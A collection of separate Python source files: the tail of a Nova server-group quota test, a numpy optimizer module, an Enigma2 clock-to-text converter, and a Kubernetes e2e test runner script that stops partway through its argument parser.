# by using NoopConductorFixture.
self.useFixture(nova_fixtures.NoopConductorFixture())
for x in range(3):
server_req = self._build_minimal_create_server_request(
self.api, 'test_concurrent_request_%s' % x,
image_uuid=fake_image.AUTO_DISK_CONFIG_ENABLED_IMAGE_UUID,
networks='none')
hints = {'group': self.created_group['id']}
# This should result in a 403 response on the 3rd server.
if x == 2:
self.api.api_post(
'/servers',
{'server': server_req, 'os:scheduler_hints': hints},
check_response_status=[403])
else:
self.api.post_server(
{'server': server_req, 'os:scheduler_hints': hints})
# There should only be two servers created which are both members of
# the same group.
servers = self.api.get_servers(detail=False)
self.assertEqual(2, len(servers))
group = self.api.api_get(
'/os-server-groups/%s' %
self.created_group['id']).body['server_group']
self.assertEqual(2, len(group['members']))
|
import numpy as np
from .utils import extract
class Optimizer(object):
def __init__(self, lr = 1e-3, *args, **kwargs):
minimize, kwargs = extract('minimize', True, **kwargs)
self._lr = lr * (2. * np.float64(minimize) - 1.)
self._construct(*args, **kwargs)
def apply(self, var_slot):
self._current = var_slot
var_slot.apply_grad(self._rule)
self._current = None
def finalize_step(self): pass
def _construct(*args, **kwargs): pass
class StochasticDescentOptimizer(Optimizer):
def _construct(self, decay = 1.):
self._decay = decay
def _rule(self, v, g):
return v - self._lr * g
def finalize_step(self):
self._lr *= self._decay
class RMSPropOptimizer(Optimizer):
def _construct(self, p = .975):
self._p = p
self._moments = dict()
def _rule(self, v, g):
c = self._current
m = self._moments
if c not in m:
m[c] = 0
r = m[c]
r = self._p * r + (1. - self._p) * g * g
m[c] = r
dv = self._lr * np.divide(g, np.sqrt(1e-8 + r))
return v - dv
class AdamOptimizer(Optimizer):
def _construct(self, p1 = .9, p2 = .999):
self._p1, self._p2 = p1, p2
self._moments = dict()
def _rule(self, v, g):
c = self._current
m = self._moments
if c not in m:
m[c] = dict({'s': 0, 'r': 0, 't': 0})
s, r, t = m[c]['s'], m[c]['r'], m[c]['t']
s = s * self._p1 + (1. - self._p1) * g
r = r * self._p2 + (1. - self._p2) * g * g
m[c]['s'], m[c]['r'], m[c]['t'] = s, r, (t + 1)
s_ = np.divide(s, 1. - np.power(self._p1, t + 1))
r_ = np.divide(r, 1. - np.power(self._p2, t + 1))
dv = self._lr * np.divide(s_, np.sqrt(r_) + 1e-8)
return v - dv
"""
Optimizer factory
"""
_optimizer_factory = dict({
'sgd' : StochasticDescentOptimizer,
'adam': AdamOptimizer,
'rmsprop': RMSPropOptimizer
})
def optimizer_factory(name, *args, **kwargs):
assert name in _optimizer_factory, \
'Optimizer {} not found'.format(name)
return _optimizer_factory[name](*args, **kwargs)
|
from Converter import Converter
from time import localtime, strftime
from Components.Element import cached
class ClockToText(Converter, object):
DEFAULT = 0
WITH_SECONDS = 1
IN_MINUTES = 2
DATE = 3
FORMAT = 4
AS_LENGTH = 5
TIMESTAMP = 6
FULL = 7
SHORT_DATE = 8
LONG_DATE = 9
VFD = 10
FULL_DATE = 11
# add: date, date as string, weekday, ...
# (whatever you need!)
def __init__(self, type):
Converter.__init__(self, type)
if type == "WithSeconds":
self.type = self.WITH_SECONDS
elif type == "InMinutes":
self.type = self.IN_MINUTES
elif type == "Date":
self.type = self.DATE
elif type == "AsLength":
self.type = self.AS_LENGTH
elif type == "Timestamp":
self.type = self.TIMESTAMP
elif type == "Full":
self.type = self.FULL
elif type == "ShortDate":
self.type = self.SHORT_DATE
elif type == "LongDate":
self.type = self.LONG_DATE
elif type == "FullDate":
self.type = self.FULL_DATE
elif type == "VFD":
self.type = self.VFD
elif "Format" in type:
self.type = self.FORMAT
self.fmt_string = type[7:]
else:
self.type = self.DEFAULT
@cached
def getText(self):
time = self.source.time
if time is None:
return ""
# handle durations
if self.type == self.IN_MINUTES:
return ngettext("%d Min", "%d Mins", (time / 60)) % (time / 60)
elif self.type == self.AS_LENGTH:
if time < 0:
return ""
return "%d:%02d" % (time / 60, time % 60)
elif self.type == self.TIMESTAMP:
return str(time)
t = localtime(time)
if self.type == self.WITH_SECONDS:
# TRANSLATORS: full time representation hour:minute:seconds
return _("%2d:%02d:%02d") % (t.tm_hour, t.tm_min, t.tm_sec)
elif self.type == self.DEFAULT:
# TRANSLATORS: short time representation hour:minute
return _("%2d:%02d") % (t.tm_hour, t.tm_min)
elif self.type == self.DATE:
# TRANSLATORS: full date representation dayname daynum monthname year in strftime() format! See 'man strftime'
d = _("%A %e %B %Y")
elif self.type == self.FULL:
# TRANSLATORS: long date representation short dayname daynum short monthname hour:minute in strftime() format! See 'man strftime'
d = _("%a %e/%m %-H:%M")
elif self.type == self.SHORT_DATE:
# TRANSLATORS: short date representation short dayname daynum short monthname in strftime() format! See 'man strftime'
d = _("%a %e/%m")
elif self.type == self.LONG_DATE:
# TRANSLATORS: long date representations dayname daynum monthname in strftime() format! See 'man strftime'
d = _("%A %e %B")
elif self.type == self.FULL_DATE:
# TRANSLATORS: full date representations sort dayname daynum monthname long year in strftime() format! See 'man strftime'
d = _("%a %e %B %Y")
elif self.type == self.VFD:
# TRANSLATORS: VFD hour:minute daynum short monthname in strftime() format! See 'man strftime'
d = _("%k:%M %e/%m")
elif self.type == self.FORMAT:
d = self.fmt_string
else:
return "???"
return strftime(d, t)
text = property(getText)
|
#!/usr/bin/env python
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Need to figure out why this only fails on travis
# pylint: disable=bad-continuation
"""Runs kubernetes e2e test with specified config"""
import argparse
import hashlib
import os
import random
import re
import shutil
import signal
import subprocess
import sys
import tempfile
import traceback
import urllib2
import time
ORIG_CWD = os.getcwd() # Checkout changes cwd
# Note: This variable is managed by experiment/bump_e2e_image.sh.
DEFAULT_KUBEKINS_TAG = 'v20180205-d99d9c246-master'
# The zones below are the zones available in the CNCF account (in theory, zones vary by account)
# We comment out zones below because we want to stay proportional to the limits
# We do one zone for every 10 t2.medium instances allowed
DEFAULT_AWS_ZONES = [
#'ap-northeast-1a', # insufficient quota
#'ap-northeast-1c', # insufficient quota
#'ap-northeast-2a', # insufficient quota
#'ap-northeast-2b', # insufficient quota
#'ap-south-1a', # no c4.large instances available
#'ap-south-1b', # no c4.large instances available
#'ap-southeast-1a', # insufficient quota
#'ap-southeast-1b', # insufficient quota
#'ap-southeast-1c', # insufficient quota
#'ap-southeast-2a', # insufficient quota
#'ap-southeast-2b', # insufficient quota
#'ap-southeast-2c', # insufficient quota
#'ca-central-1a', # insufficient quota
#'ca-central-1b', # insufficient quota
#'eu-central-1a', # insufficient quota
#'eu-central-1b', # insufficient quota
#'eu-central-1c', # insufficient quota
#'eu-west-1a', # insufficient quota
#'eu-west-1b', # insufficient quota
#'eu-west-1c', # insufficient quota
#'eu-west-2a', # insufficient quota
#'eu-west-2b', # insufficient quota
#'eu-west-2c', # insufficient quota
#'eu-west-3a', # insufficient quota
#'eu-west-3b', # insufficient quota
#'eu-west-3c', # insufficient quota
#'sa-east-1a', # insufficient quota
#'sa-east-1c' # insufficient quota
'us-east-1a',
'us-east-1b',
#'us-east-1c', # limiting to 2 zones to not overallocate
#'us-east-1d', # limiting to 2 zones to not overallocate
#'us-east-1e', # limiting to 2 zones to not overallocate
#'us-east-1f', # limiting to 2 zones to not overallocate
#'us-east-2a', # no c4.large instances available
#'us-east-2b', # no c4.large instances available
#'us-east-2c', # no c4.large instances available
'us-west-1a',
#'us-west-1b', # overall limit is 10 instances
'us-west-2a',
'us-west-2b',
#'us-west-2c' # limiting to 2 zones to not overallocate
]
def test_infra(*paths):
"""Return path relative to root of test-infra repo."""
return os.path.join(ORIG_CWD, os.path.dirname(__file__), '..', *paths)
def check(*cmd):
"""Log and run the command, raising on errors."""
print >>sys.stderr, 'Run:', cmd
subprocess.check_call(cmd)
def check_output(*cmd):
"""Log and run the command, raising on errors, return output"""
print >>sys.stderr, 'Run:', cmd
return subprocess.check_output(cmd)
def check_env(env, *cmd):
"""Log and run the command with a specific env, raising on errors."""
print >>sys.stderr, 'Environment:'
for key, value in sorted(env.items()):
print >>sys.stderr, '%s=%s' % (key, value)
print >>sys.stderr, 'Run:', cmd
subprocess.check_call(cmd, env=env)
def kubekins(tag):
"""Return full path to kubekins-e2e:tag."""
return 'gcr.io/k8s-testimages/kubekins-e2e:%s' % tag
def parse_env(env):
"""Returns (FOO, BAR=MORE) for FOO=BAR=MORE."""
return env.split('=', 1)
def aws_role_config(profile, arn):
return (('[profile jenkins-assumed-role]\n' +
'role_arn = %s\n' +
'source_profile = %s\n') %
(arn, profile))
def kubeadm_version(mode, shared_build_gcs_path):
"""Return string to use for kubeadm version, given the job's mode (ci/pull/periodic)."""
version = ''
if mode in ['ci', 'periodic']:
# This job only runs against the kubernetes repo, and bootstrap.py leaves the
# current working directory at the repository root. Grab the SCM_REVISION so we
# can use the .debs built during the bazel-build job that should have already
# succeeded.
status = re.search(
r'STABLE_BUILD_SCM_REVISION ([^\n]+)',
check_output('hack/print-workspace-status.sh')
)
if not status:
raise ValueError('STABLE_BUILD_SCM_REVISION not found')
version = status.group(1)
# Work-around for release-1.6 jobs, which still upload debs to an older
# location (without os/arch prefixes).
# TODO(pipejakob): remove this when we no longer support 1.6.x.
if version.startswith('v1.6.'):
return 'gs://kubernetes-release-dev/bazel/%s/build/debs/' % version
# The path given here should match jobs/ci-kubernetes-bazel-build.sh
return 'gs://kubernetes-release-dev/bazel/%s/bin/linux/amd64/' % version
elif mode == 'pull':
# The format of shared_build_gcs_path looks like:
# gs://kubernetes-release-dev/bazel/<git-describe-output>
# Add bin/linux/amd64 yet to that path so it points to the dir with the debs
return '%s/bin/linux/amd64/' % shared_build_gcs_path
elif mode == 'stable':
# This job need not run against the kubernetes repo and uses the stable version
# of kubeadm packages. This mode may be desired when kubeadm itself is not the
# SUT (System Under Test).
return 'stable'
else:
raise ValueError("Unknown kubeadm mode given: %s" % mode)
class LocalMode(object):
"""Runs e2e tests by calling kubetest."""
def __init__(self, workspace, artifacts):
self.command = 'kubetest'
self.workspace = workspace
self.artifacts = artifacts
self.env = []
self.os_env = []
self.env_files = []
self.add_environment(
'HOME=%s' % workspace,
'WORKSPACE=%s' % workspace,
'PATH=%s' % os.getenv('PATH'),
)
def add_environment(self, *envs):
"""Adds FOO=BAR to the list of environment overrides."""
self.env.extend(parse_env(e) for e in envs)
def add_os_environment(self, *envs):
"""Adds FOO=BAR to the list of os environment overrides."""
self.os_env.extend(parse_env(e) for e in envs)
def add_file(self, env_file):
"""Reads all FOO=BAR lines from env_file."""
with open(env_file) as fp:
for line in fp:
line = line.rstrip()
if not line or line.startswith('#'):
continue
self.env_files.append(parse_env(line))
def add_env(self, env):
self.env_files.append(parse_env(env))
def add_aws_cred(self, priv, pub, cred):
"""Sets aws keys and credentials."""
ssh_dir = os.path.join(self.workspace, '.ssh')
if not os.path.isdir(ssh_dir):
os.makedirs(ssh_dir)
cred_dir = os.path.join(self.workspace, '.aws')
if not os.path.isdir(cred_dir):
os.makedirs(cred_dir)
aws_ssh = os.path.join(ssh_dir, 'kube_aws_rsa')
aws_pub = os.path.join(ssh_dir, 'kube_aws_rsa.pub')
aws_cred = os.path.join(cred_dir, 'credentials')
shutil.copy(priv, aws_ssh)
shutil.copy(pub, aws_pub)
shutil.copy(cred, aws_cred)
self.add_environment(
'JENKINS_AWS_SSH_PRIVATE_KEY_FILE=%s' % priv,
'JENKINS_AWS_SSH_PUBLIC_KEY_FILE=%s' % pub,
'JENKINS_AWS_CREDENTIALS_FILE=%s' % cred,
)
def add_aws_role(self, profile, arn):
with open(os.path.join(self.workspace, '.aws', 'config'), 'w') as cfg:
cfg.write(aws_role_config(profile, arn))
self.add_environment('AWS_SDK_LOAD_CONFIG=true')
return 'jenkins-assumed-role'
def add_gce_ssh(self, priv, pub):
"""Copies priv, pub keys to $WORKSPACE/.ssh."""
ssh_dir = os.path.join(self.workspace, '.ssh')
if not os.path.isdir(ssh_dir):
os.makedirs(ssh_dir)
gce_ssh = os.path.join(ssh_dir, 'google_compute_engine')
gce_pub = os.path.join(ssh_dir, 'google_compute_engine.pub')
shutil.copy(priv, gce_ssh)
shutil.copy(pub, gce_pub)
self.add_environment(
'JENKINS_GCE_SSH_PRIVATE_KEY_FILE=%s' % gce_ssh,
'JENKINS_GCE_SSH_PUBLIC_KEY_FILE=%s' % gce_pub,
)
@staticmethod
def add_service_account(path):
"""Returns path."""
return path
def add_k8s(self, *a, **kw):
"""Add specified k8s.io repos (noop)."""
pass
def use_latest_image(self, image_family, image_project):
"""Gets the latest image from the image_family in the image_project."""
out = check_output(
'gcloud', 'compute', 'images', 'describe-from-family',
image_family, '--project=%s' % image_project)
latest_image = next(
(line[6:].strip() for line in out.split('\n') if (
line.startswith('name: '))),
None)
if not latest_image:
raise ValueError(
'Failed to get the latest image from family %s in project %s' % (
image_family, image_project))
# TODO(yguo0905): Support this in GKE.
self.add_environment(
'KUBE_GCE_NODE_IMAGE=%s' % latest_image,
'KUBE_GCE_NODE_PROJECT=%s' % image_project)
print >>sys.stderr, 'Set KUBE_GCE_NODE_IMAGE=%s' % latest_image
print >>sys.stderr, 'Set KUBE_GCE_NODE_PROJECT=%s' % image_project
def add_aws_runner(self):
"""Start with kops-e2e-runner.sh"""
# TODO(Krzyzacy):retire kops-e2e-runner.sh
self.command = os.path.join(self.workspace, 'kops-e2e-runner.sh')
def start(self, args):
"""Starts kubetest."""
print >>sys.stderr, 'starts with local mode'
env = {}
env.update(self.os_env)
env.update(self.env_files)
env.update(self.env)
check_env(env, self.command, *args)
class DockerMode(object):
"""Runs e2e tests via docker run kubekins-e2e."""
def __init__(self, container, artifacts, sudo, tag, mount_paths):
self.tag = tag
try: # Pull a newer version if one exists
check('docker', 'pull', kubekins(tag))
except subprocess.CalledProcessError:
pass
print 'Starting %s...' % container
self.workspace = '/workspace'
self.container = container
self.local_artifacts = artifacts
self.artifacts = os.path.join(self.workspace, '_artifacts')
self.cmd = [
'docker', 'run', '--rm',
'--name=%s' % container,
'-v', '%s:%s' % (artifacts, self.artifacts),
'-v', '/etc/localtime:/etc/localtime:ro',
]
for path in mount_paths or []:
self.cmd.extend(['-v', path])
if sudo:
self.cmd.extend(['-v', '/var/run/docker.sock:/var/run/docker.sock'])
self.add_env('HOME=%s' % self.workspace)
self.add_env('WORKSPACE=%s' % self.workspace)
self.cmd.append(
'--entrypoint=/workspace/kubetest'
)
def add_environment(self, *envs):
"""Adds FOO=BAR to the -e list for docker.
Host-specific environment variables are ignored."""
# TODO(krzyzacy) change this to a whitelist?
docker_env_ignore = [
'GOOGLE_APPLICATION_CREDENTIALS',
'GOPATH',
'GOROOT',
'HOME',
'PATH',
'PWD',
'WORKSPACE'
]
for env in envs:
key, _value = parse_env(env)
if key in docker_env_ignore:
print >>sys.stderr, 'Skipping environment variable %s' % env
else:
self.add_env(env)
def add_os_environment(self, *envs):
"""Adds os envs as FOO=BAR to the -e list for docker."""
self.add_environment(*envs)
def add_file(self, env_file):
"""Adds the file to the --env-file list."""
self.cmd.extend(['--env-file', env_file])
def add_env(self, env):
"""Adds a single environment variable to the -e list for docker.
Does not check against any blacklists."""
self.cmd.extend(['-e', env])
def add_k8s(self, k8s, *repos):
"""Add the specified k8s.io repos into container."""
for repo in repos:
self.cmd.extend([
'-v', '%s/%s:/go/src/k8s.io/%s' % (k8s, repo, repo)])
def add_aws_cred(self, priv, pub, cred):
"""Mounts aws keys/creds inside the container."""
aws_ssh = os.path.join(self.workspace, '.ssh', 'kube_aws_rsa')
aws_pub = '%s.pub' % aws_ssh
aws_cred = os.path.join(self.workspace, '.aws', 'credentials')
self.cmd.extend([
'-v', '%s:%s:ro' % (priv, aws_ssh),
'-v', '%s:%s:ro' % (pub, aws_pub),
'-v', '%s:%s:ro' % (cred, aws_cred),
])
def add_aws_role(self, profile, arn):
with tempfile.NamedTemporaryFile(prefix='aws-config', delete=False) as cfg:
cfg.write(aws_role_config(profile, arn))
self.cmd.extend([
'-v', '%s:%s:ro' % (os.path.join(self.workspace, '.aws', 'config'), cfg.name),
'-e', 'AWS_SDK_LOAD_CONFIG=true',
])
return 'jenkins-assumed-role'
def add_aws_runner(self):
"""Run kops_aws_runner for kops-aws jobs."""
self.cmd.append(
'--entrypoint=%s/kops-e2e-runner.sh' % self.workspace
)
def add_gce_ssh(self, priv, pub):
"""Mounts priv and pub inside the container."""
gce_ssh = os.path.join(self.workspace, '.ssh', 'google_compute_engine')
gce_pub = '%s.pub' % gce_ssh
self.cmd.extend([
'-v', '%s:%s:ro' % (priv, gce_ssh),
'-v', '%s:%s:ro' % (pub, gce_pub),
'-e', 'JENKINS_GCE_SSH_PRIVATE_KEY_FILE=%s' % gce_ssh,
'-e', 'JENKINS_GCE_SSH_PUBLIC_KEY_FILE=%s' % gce_pub])
def add_service_account(self, path):
"""Mounts path at /service-account.json inside the container."""
service = '/service-account.json'
self.cmd.extend(['-v', '%s:%s:ro' % (path, service)])
return service
def start(self, args):
"""Runs kubetest inside a docker container."""
print >>sys.stderr, 'starts with docker mode'
cmd = list(self.cmd)
cmd.append(kubekins(self.tag))
cmd.extend(args)
signal.signal(signal.SIGTERM, self.sig_handler)
signal.signal(signal.SIGINT, self.sig_handler)
try:
check(*cmd)
finally: # Ensure docker files are readable by bootstrap
if not os.path.isdir(self.local_artifacts): # May not exist
pass
try:
check('sudo', 'chmod', '-R', 'o+r', self.local_artifacts)
except subprocess.CalledProcessError: # fails outside CI
traceback.print_exc()
def sig_handler(self, _signo, _frame):
"""Stops container upon receive signal.SIGTERM and signal.SIGINT."""
print >>sys.stderr, 'docker stop (signo=%s, frame=%s)' % (_signo, _frame)
check('docker', 'stop', self.container)
def cluster_name(cluster, build):
"""Return or select a cluster name."""
if cluster:
return cluster
if len(build) < 20:
return 'e2e-%s' % build
return 'e2e-%s' % hashlib.md5(build).hexdigest()[:10]
# TODO(krzyzacy): Move this into kubetest
def build_kops(kops, mode):
"""Build kops, set kops related envs."""
if not os.path.basename(kops) == 'kops':
raise ValueError(kops)
version = 'pull-' + check_output('git', 'describe', '--always').strip()
job = os.getenv('JOB_NAME', 'pull-kops-e2e-kubernetes-aws')
gcs = 'gs://kops-ci/pulls/%s' % job
gapi = 'https://storage.googleapis.com/kops-ci/pulls/%s' % job
mode.add_environment(
'KOPS_BASE_URL=%s/%s' % (gapi, version),
'GCS_LOCATION=%s' % gcs
)
check('make', 'gcs-publish-ci', 'VERSION=%s' % version, 'GCS_LOCATION=%s' % gcs)
def set_up_kops_gce(workspace, args, mode, cluster, runner_args):
"""Set up kops on GCE envs."""
for path in [args.gce_ssh, args.gce_pub]:
if not os.path.isfile(os.path.expandvars(path)):
raise IOError(path, os.path.expandvars(path))
mode.add_gce_ssh(args.gce_ssh, args.gce_pub)
gce_ssh = os.path.join(workspace, '.ssh', 'google_compute_engine')
zones = args.kops_zones or random.choice([
'us-central1-a',
'us-central1-b',
'us-central1-c',
'us-central1-f',
])
runner_args.extend([
'--kops-cluster=%s' % cluster,
'--kops-zones=%s' % zones,
'--kops-state=%s' % args.kops_state_gce,
'--kops-nodes=%s' % args.kops_nodes,
'--kops-ssh-key=%s' % gce_ssh,
])
def set_up_kops_aws(workspace, args, mode, cluster, runner_args):
"""Set up aws related envs for kops. Will replace set_up_aws."""
for path in [args.aws_ssh, args.aws_pub, args.aws_cred]:
if not os.path.isfile(os.path.expandvars(path)):
raise IOError(path, os.path.expandvars(path))
mode.add_aws_cred(args.aws_ssh, args.aws_pub, args.aws_cred)
aws_ssh = os.path.join(workspace, '.ssh', 'kube_aws_rsa')
profile = args.aws_profile
if args.aws_role_arn:
profile = mode.add_aws_role(profile, args.aws_role_arn)
zones = args.kops_zones or random.choice(DEFAULT_AWS_ZONES)
regions = ','.join([zone[:-1] for zone in zones.split(',')])
mode.add_environment(
'AWS_PROFILE=%s' % profile,
'AWS_DEFAULT_PROFILE=%s' % profile,
'KOPS_REGIONS=%s' % regions,
)
if args.aws_cluster_domain:
cluster = '%s.%s' % (cluster, args.aws_cluster_domain)
runner_args.extend([
'--kops-cluster=%s' % cluster,
'--kops-zones=%s' % zones,
'--kops-state=%s' % args.kops_state,
'--kops-nodes=%s' % args.kops_nodes,
'--kops-ssh-key=%s' % aws_ssh,
"--kops-ssh-user=admin",
])
def set_up_aws(workspace, args, mode, cluster, runner_args):
"""Set up aws related envs. Legacy; will be replaced by set_up_kops_aws."""
for path in [args.aws_ssh, args.aws_pub, args.aws_cred]:
if not os.path.isfile(os.path.expandvars(path)):
raise IOError(path, os.path.expandvars(path))
mode.add_aws_cred(args.aws_ssh, args.aws_pub, args.aws_cred)
aws_ssh = os.path.join(workspace, '.ssh', 'kube_aws_rsa')
profile = args.aws_profile
if args.aws_role_arn:
profile = mode.add_aws_role(profile, args.aws_role_arn)
zones = args.kops_zones or random.choice(DEFAULT_AWS_ZONES)
regions = ','.join([zone[:-1] for zone in zones.split(',')])
mode.add_environment(
'AWS_PROFILE=%s' % profile,
'AWS_DEFAULT_PROFILE=%s' % profile,
'KOPS_REGIONS=%s' % regions,
)
if args.aws_cluster_domain:
cluster = '%s.%s' % (cluster, args.aws_cluster_domain)
runner_args.extend([
'--kops-cluster=%s' % cluster,
'--kops-zones=%s' % zones,
'--kops-state=%s' % args.kops_state,
'--kops-nodes=%s' % args.kops_nodes,
'--kops-ssh-key=%s' % aws_ssh,
"--kops-ssh-user=admin",
])
# TODO(krzyzacy):Remove after retire kops-e2e-runner.sh
mode.add_aws_runner()
def read_gcs_path(gcs_path):
"""reads a gcs path (gs://...) by GETing storage.googleapis.com"""
link = gcs_path.replace('gs://', 'https://storage.googleapis.com/')
loc = urllib2.urlopen(link).read()
print >>sys.stderr, "Read GCS Path: %s" % loc
return loc
def get_shared_gcs_path(gcs_shared, use_shared_build):
"""return the shared path for this set of jobs using args and $PULL_REFS."""
build_file = ''
if use_shared_build:
build_file += use_shared_build + '-'
build_file += 'build-location.txt'
return os.path.join(gcs_shared, os.getenv('PULL_REFS', ''), build_file)
def main(args):
"""Set up env, start kubekins-e2e, handle termination. """
# pylint: disable=too-many-branches,too-many-statements,too-many-locals
# Rules for env var priority here in docker:
# -e FOO=a -e FOO=b -> FOO=b
# --env-file FOO=a --env-file FOO=b -> FOO=b
# -e FOO=a --env-file FOO=b -> FOO=a(!!!!)
# --env-file FOO=a -e FOO=b -> FOO=b
#
# So if you overwrite FOO=c for a local run it will take precedence.
#
# Set up workspace/artifacts dir
workspace = os.environ.get('WORKSPACE', os.getcwd())
artifacts = os.path.join(workspace, '_artifacts')
if not os.path.isdir(artifacts):
os.makedirs(artifacts)
container = '%s-%s' % (os.environ.get('JOB_NAME'), os.environ.get('BUILD_NUMBER'))
if args.mode == 'docker':
sudo = args.docker_in_docker or args.build is not None or args.build_federation is not None
mode = DockerMode(container, artifacts, sudo, args.tag, args.mount_paths)
elif args.mode == 'local':
mode = LocalMode(workspace, artifacts) # pylint: disable=bad-option-value
else:
raise ValueError(args.mode)
for env_file in args.env_file:
mode.add_file(test_infra(env_file))
for env in args.env:
mode.add_env(env)
# TODO(fejta): remove after next image push
mode.add_environment('KUBETEST_MANUAL_DUMP=y')
runner_args = [
'-v',
'--dump=%s' % mode.artifacts,
]
if args.service_account:
runner_args.append(
'--gcp-service-account=%s' % mode.add_service_account(args.service_account))
shared_build_gcs_path = ""
if args.use_shared_build is not None:
# find shared build location from GCS
gcs_path = get_shared_gcs_path(args.gcs_shared, args.use_shared_build)
print >>sys.stderr, 'Getting shared build location from: '+gcs_path
# retry loop for reading the location
attempts_remaining = 12
while True:
attempts_remaining -= 1
try:
# tell kubetest to extract from this location
shared_build_gcs_path = read_gcs_path(gcs_path)
args.kubetest_args.append('--extract=' + shared_build_gcs_path)
args.build = None
break
except urllib2.URLError as err:
print >>sys.stderr, 'Failed to get shared build location: %s' % err
if attempts_remaining > 0:
print >>sys.stderr, 'Waiting 5 seconds and retrying...'
time.sleep(5)
else:
raise RuntimeError('Failed to get shared build location too many times!')
elif args.build is not None:
if args.build == '':
# Empty string means --build was passed without any arguments;
# if --build wasn't passed, args.build would be None
runner_args.append('--build')
else:
runner_args.append('--build=%s' % args.build)
k8s = os.getcwd()
if not os.path.basename(k8s) == 'kubernetes':
raise ValueError(k8s)
mode.add_k8s(os.path.dirname(k8s), 'kubernetes', 'release')
if args.build_federation is not None:
if args.build_federation == '':
runner_args.append('--build-federation')
else:
runner_args.append('--build-federation=%s' % args.build_federation)
fed = os.getcwd()
if not os.path.basename(fed) == 'federation':
raise ValueError(fed)
mode.add_k8s(os.path.dirname(fed), 'federation', 'release')
if args.kops_build:
build_kops(os.getcwd(), mode)
if args.stage is not None:
runner_args.append('--stage=%s' % args.stage)
if args.aws:
for line in check_output('hack/print-workspace-status.sh').split('\n'):
if 'gitVersion' in line:
_, version = line.strip().split(' ')
break
else:
raise ValueError('kubernetes version not found in workspace status')
runner_args.append('--kops-kubernetes-version=%s/%s' % (
args.stage.replace('gs://', 'https://storage.googleapis.com/'),
version))
# TODO(fejta): move these out of this file
if args.up == 'true':
runner_args.append('--up')
if args.down == 'true':
runner_args.append('--down')
if args.test == 'true':
runner_args.append('--test')
# Passthrough some args to kubetest
if args.deployment:
runner_args.append('--deployment=%s' % args.deployment)
if args.provider:
runner_args.append('--provider=%s' % args.provider)
cluster = cluster_name(args.cluster, os.getenv('BUILD_NUMBER', 0))
runner_args.append('--cluster=%s' % cluster)
runner_args.append('--gcp-network=%s' % cluster)
runner_args.extend(args.kubetest_args)
if args.use_logexporter:
# TODO(fejta): Take the below value through a flag instead of env var.
runner_args.append('--logexporter-gcs-path=%s' % os.environ.get('GCS_ARTIFACTS_DIR', ''))
if args.kubeadm:
version = kubeadm_version(args.kubeadm, shared_build_gcs_path)
runner_args.extend([
'--kubernetes-anywhere-path=%s' % os.path.join(workspace, 'kubernetes-anywhere'),
'--kubernetes-anywhere-phase2-provider=kubeadm',
'--kubernetes-anywhere-cluster=%s' % cluster,
'--kubernetes-anywhere-kubeadm-version=%s' % version,
])
if args.kubeadm == "pull":
# If this is a pull job; the kubelet version should equal
# the kubeadm version here: we should use debs from the PR build
runner_args.extend([
'--kubernetes-anywhere-kubelet-version=%s' % version,
])
if args.aws:
# Legacy - prefer passing --deployment=kops, --provider=aws,
# which does not use kops-e2e-runner.sh
set_up_aws(mode.workspace, args, mode, cluster, runner_args)
elif args.deployment == 'kops' and args.provider == 'aws':
set_up_kops_aws(mode.workspace, args, mode, cluster, runner_args)
elif args.deployment == 'kops' and args.provider == 'gce':
set_up_kops_gce(mode.workspace, args, mode, cluster, runner_args)
elif args.gce_ssh:
mode.add_gce_ssh(args.gce_ssh, args.gce_pub)
# TODO(fejta): delete this?
mode.add_os_environment(*(
'%s=%s' % (k, v) for (k, v) in os.environ.items()))
mode.add_environment(
# Boilerplate envs
# Skip gcloud update checking
'CLOUDSDK_COMPONENT_MANAGER_DISABLE_UPDATE_CHECK=true',
# Use default component update behavior
'CLOUDSDK_EXPERIMENTAL_FAST_COMPONENT_UPDATE=false',
# AWS
'KUBE_AWS_INSTANCE_PREFIX=%s' % cluster,
# GCE
'INSTANCE_PREFIX=%s' % cluster,
'KUBE_GCE_INSTANCE_PREFIX=%s' % cluster,
)
if args and args.image_family and args.image_project:
mode.use_latest_image(args.image_family, args.image_project)
mode.start(runner_args)
def create_parser():
"""Create argparser."""
parser = argparse.ArgumentParser()
parser.add_argument(
'--mode', default='local', choices=['local', 'docker'])
parser.add_argument(
'--env-file', default=[], action="append",
help='Job specific environment file')
parser.add_argument(
'--env', default=[], action="append",
help='Job specific environment setting ' +
'(usage: "--env=VAR=SETTING" will set VAR to SETTING).')
parser.add_argument(
'--image-family',
help='The image family from which to fetch the latest image')
parser.add_argument(
'--image-project',
help='The image project from which to fetch the test images')
parser.add_argument(
'--gce-ssh',
default=os.environ.get('JENKINS_GCE_SSH_PRIVATE_KEY_FILE'),
help='Path to .ssh/google_compute_engine keys')
parser.add_argument(
'--gce-pub',
default=os.environ.get('JENKINS_GCE_SSH_PUBLIC_KEY_FILE'),
help='Path to pub gce ssh key')
parser.add_argument(
'--service-account',
default=os.environ.get('GOOGLE_APPLICATION_CREDENTIALS'),
help='Path to service-account.json')
parser.add_argument(
'--mount-paths',
action='append',
help='Paths that should be mounted within the docker container in the form local:remote')
parser.add_argument(
'--build', nargs='?', default=None, const='',
help='Build kubernetes binaries if set, optionally specifying strategy')
parser.add_argument(
'--build-federation', nargs='?', default=None, const='',
help='Build federation binaries if set, optionally specifying strategy')
parser.add_argument(
'--use-shared-build', nargs='?', default=None, const='',
help='Use prebuilt kubernetes binaries if set, optionally specifying strategy')
parser.add_argument(
'--gcs-shared',
default='gs://kubernetes-jenkins/shared-results/',
help='Get shared build from this bucket')
parser.add_argument(
'--cluster', default='bootstrap-e2e', help='Name of the cluster')
parser.add_argument(
'--docker-in-docker', action='store_true', help='Enable run docker within docker')
parser.add_argument(
'--kubeadm', choices=['ci', 'periodic', 'pull', 'stable'])
parser.add_argument(
'--stage', default=None, help='Stage release to GCS path provided')
parser.add_argument(
'--tag', default=DEFAULT_KUBEKINS_TAG, help='Use a specific kubekins-e2e tag if set')
parser.add_argument(
'--test', default='true', help='If we need to run any actual test within kubetest')
parser.add_argument(
'--down', default='true', help='If we need to tear down the e2e cluster')
parser.add_argument(
'--up', default='true', help='If we need to bring up a e2e cluster')
parser.add_argument(
'--use-logexporter',
action='store_true',
help='If we need to use logexporter tool to upload logs from nodes to GCS directly')
